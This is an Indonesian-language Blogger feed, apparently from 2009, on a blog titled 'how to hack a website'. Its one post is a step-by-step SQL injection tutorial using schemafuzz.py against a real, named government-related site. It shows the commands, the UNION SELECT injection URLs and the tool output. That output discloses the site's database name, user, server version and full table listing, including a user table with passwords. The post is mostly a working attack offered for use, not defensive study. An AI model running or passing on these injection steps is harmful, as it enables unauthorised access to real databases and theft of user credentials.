<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6178732296990762006</id><updated>2011-04-21T22:36:03.299-07:00</updated><title type='text'>cara ngehack web</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://a-dwisatya.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6178732296990762006/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://a-dwisatya.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Dimas Triyono</name><uri>http://www.blogger.com/profile/01278409905596688599</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>1</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6178732296990762006.post-552776787191400670</id><published>2009-02-10T00:22:00.000-08:00</published><updated>2009-02-10T00:23:09.673-08:00</updated><title type='text'>menggunakan schemafuzz.py</title><content type='html'>&lt;pre&gt;1.Python (&lt;a rel="nofollow" href="http://www.python.org/ftp/python/2.5/python-2.5.msi"&gt;http://www.python.org/ftp/python/2.5/python-2.5.msi&lt;/a&gt;)&lt;br /&gt;2.Schemafuzz (&lt;a rel="nofollow" href="http://darkc0de.com/others/schemafuzz.py"&gt;http://darkc0de.com/others/schemafuzz.py&lt;/a&gt;)&lt;br /&gt;3.CMD&lt;br /&gt;&lt;br /&gt;Dg cmd masuk ke folder tempat schemafuzz.py berada...&lt;br /&gt;Awali pertintah dengan format:&lt;br /&gt;schemafuzz.py -u "url target" --perintah&lt;br /&gt;List perintah ada dibawah...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.Cari target&lt;br /&gt;Misal: &lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1"&gt;http://www.ditplb.or.id/profile.php?id=1&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2.Masukkan perintah untuk mencari colom&lt;br /&gt;Misal: schemafuzz.py -u "&lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1%22"&gt;http://www.ditplb.or.id/profile.php?id=1"&lt;/a&gt;; --findcol&lt;br /&gt;Maka keluar:&lt;br /&gt;[+] URL: &lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1--"&gt;http://www.ditplb.or.id/profile.php?id=1--&lt;/a&gt;&lt;br /&gt;[+]&lt;br /&gt;Evasion Used: "+" "--"&lt;br /&gt;&lt;br /&gt;[+] 20:36:29&lt;br /&gt;&lt;br /&gt;[-] Proxy Not Given&lt;br /&gt;&lt;br /&gt;[+] Attempting To find the number of columns...&lt;br /&gt;&lt;br /&gt;[+] Testing: 0,1,2,&lt;br /&gt;[+] Column Length is: 3&lt;br /&gt;&lt;br /&gt;[+] Found null column at column #: 2&lt;br /&gt;&lt;br /&gt;[+] SQLi URL:&lt;br /&gt;&lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--"&gt;http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[+] darkc0de&lt;br /&gt;URL: &lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"&gt;http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de&lt;/a&gt;&lt;br /&gt;[-] Done!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Berarti kita gunain&lt;br /&gt;&lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"&gt;http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de&lt;/a&gt;&lt;br /&gt;untuk inject&lt;br /&gt;&lt;br /&gt;3.Cari database dg command --dbs&lt;br /&gt;Misal : schemafuzz.py -u&lt;br /&gt;"&lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de%22"&gt;http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"&lt;/a&gt;;&lt;br /&gt;--dbs&lt;br /&gt;Maka keluar:&lt;br /&gt;[+] URL:&lt;br /&gt;&lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--"&gt;http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[+] Evasion Used: "+" "--"&lt;br /&gt;&lt;br /&gt;[+] 20:39:32&lt;br /&gt;&lt;br /&gt;[-] Proxy Not Given&lt;br /&gt;&lt;br /&gt;[+] Gathering MySQL Server Configuration...&lt;br /&gt;   &lt;br /&gt;Database: t15618_plb   &lt;br /&gt;User: t15618_pl...@localhost&lt;br /&gt;   &lt;br /&gt;Version: 5.0.32-Debian_7etch8&lt;br /&gt;&lt;br /&gt;[+] Showing all databases current user has access too!&lt;br /&gt;&lt;br /&gt;[+] Number of Databases: 1&lt;br /&gt;&lt;br /&gt;[0] t15618_plb&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[-] 20:39:39&lt;br /&gt;&lt;br /&gt;[-] Total URL Requests 3&lt;br /&gt;&lt;br /&gt;[-] Done&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;keliatan kan nama databasenya ??? t15618_plb&lt;br /&gt;&lt;br /&gt;4.Cari nama table dalam database&lt;br /&gt;Misal: schemafuzz.py -u&lt;br /&gt;"&lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de%22"&gt;http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"&lt;/a&gt;;&lt;br /&gt;--schema -D namadatabase&lt;br /&gt;Jadinya: schemafuzz.py -u&lt;br /&gt;"&lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de%22"&gt;http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"&lt;/a&gt;;&lt;br /&gt;--schema -D t15618_plb&lt;br /&gt;Maka keluar:&lt;br /&gt;&lt;br /&gt;[+] URL:&lt;br /&gt;&lt;a rel="nofollow" href="http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--"&gt;http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[+] Evasion Used: "+" "--"&lt;br /&gt;&lt;br /&gt;[+] 20:43:10&lt;br /&gt;&lt;br /&gt;[-] Proxy Not Given&lt;br /&gt;[+] Gathering MySQL Server Configuration...&lt;br /&gt;&lt;br /&gt;Database: t15618_plb&lt;br /&gt;   &lt;br /&gt;User: t15618_pl...@localhost&lt;br /&gt;&lt;br /&gt;Version: 5.0.32-Debian_7etch8&lt;br /&gt;[+] Showing Tables &amp;amp; Columns from database "t15618_plb"&lt;br /&gt;[+] Number of Tables: 11&lt;br /&gt;[Database]: t15618_plb&lt;br /&gt;[Table: Columns]&lt;br /&gt;[0]bukutamu: id,pengirim,email,pesan&lt;br /&gt;[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim&lt;br /&gt;[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan&lt;br /&gt;[3]frm_kategori: id_kat,kategori&lt;br /&gt;[4]kabupaten: ID_kab,ID_prop,Kabupaten&lt;br /&gt;[5]pelatihan: ID,Pelatihan&lt;br /&gt;[6]profile: ID_Profile,sinopsis,Profile&lt;br /&gt;[7]propinsi: ID_prop,Propinsi&lt;br /&gt;[8]sd: ID_sd,ID_1,SD,Detail&lt;br /&gt;[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email&lt;br /&gt;[10]user: ID_user,UserID,Password,Keterangan,Admin&lt;br /&gt;[-] 20:44:39&lt;br /&gt;[-] Total URL Requests 43&lt;br /&gt;[-] Done&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6178732296990762006-552776787191400670?l=a-dwisatya.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://a-dwisatya.blogspot.com/feeds/552776787191400670/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://a-dwisatya.blogspot.com/2009/02/menggunakan-schemafuzzpy.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6178732296990762006/posts/default/552776787191400670'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6178732296990762006/posts/default/552776787191400670'/><link rel='alternate' type='text/html' href='http://a-dwisatya.blogspot.com/2009/02/menggunakan-schemafuzzpy.html' title='menggunakan schemafuzz.py'/><author><name>Dimas Triyono</name><uri>http://www.blogger.com/profile/01278409905596688599</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry></feed>
